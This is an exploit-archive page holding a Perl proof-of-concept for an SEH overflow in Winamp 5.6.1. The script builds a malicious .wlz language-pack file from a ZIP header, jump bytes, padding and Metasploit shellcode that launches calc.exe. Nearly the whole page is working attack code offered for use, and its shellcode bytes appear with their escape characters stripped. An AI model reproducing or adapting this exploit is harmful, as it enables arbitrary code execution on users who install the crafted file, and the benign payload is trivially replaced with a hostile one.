Home / exploits Winamp 5.6.1 Install Language SEH Overflow
Posted on 12 April 2011
#!/usr/bin/perl # --------- # Winamp <=5.6.1 Install Language SEH Exploit # Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com> # special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team # --------- # In Winamp 5.6.1 Install New Language with (.wlz) file # and In File (.wlz) can Inclusion SEH for Installing ... my $header = "x50x4bx03x04x14x00x00x00x00x00x2fx92x7bx3dxd3x55". "x30x92x00x28x00x00x00x28x00x00x08x00x00x00x61x75". "x74x68x2ex6cx6ex67"; my $jump = "xebx06x90x90" ; # short jump my $junk = "x41" x 321; # Buffer my $nops = "x90" x 51; # Nopsled # windows/exec - 224 bytes (http://www.metasploit.com) # EXITFUNC=seh, CMD=calc.exe , Encoder: x86/call4_dword_xor my $shell = "x33xc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76" . "x0ex26x7ex29x35x83xeexfcxe2xf4xdax96xa0x35" . "x26x7ex49xbcxc3x4fxfbx51xadx2cx19xbex74x72" . "xa2x67x32xf5x5bx1dx29xc9x63x13x17x81x18xf5" . "x8ax42x48x49x24x52x09xf4xe9x73x28xf2xc4x8e" . "x7bx62xadx2cx39xbex64x42x28xe5xadx3ex51xb0" . "xe6x0ax63x34xf6x2exa2x7dx3exf5x71x15x27xad" . "xcax09x6fxf5x1dxbex27xa8x18xcax17xbex85xf4" . "xe9x73x28xf2x1ex9ex5cxc1x25x03xd1x0ex5bx5a" . "x5cxd7x7exf5x71x11x27xadx4fxbex2ax35xa2x6d" . "x3ax7fxfaxbex22xf5x28xe5xafx3ax0dx11x7dx25" . "x48x6cx7cx2fxd6xd5x7ex21x73xbex34x95xafx68" . "x4cx7fxa4xb0x9fx7ex29x35x76x16x18xbex49xf9" . "xd6xe0x9dx80x27x07xccx16x8fxa0x9bxe3xd6xe0" . "x1ax78x55x3fxa6x85xc9x40x23xc5x6ex26x54x11" . "x43x35x75x81xfcx56x47x12x4ax1bx43x06x4cx35"; my $exploit = $header.$jump.$junk.$jump.$shell.$nops; open(myfile,'>>ar-dz.wlz'); print myfile $exploit; close (myfile); # KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans
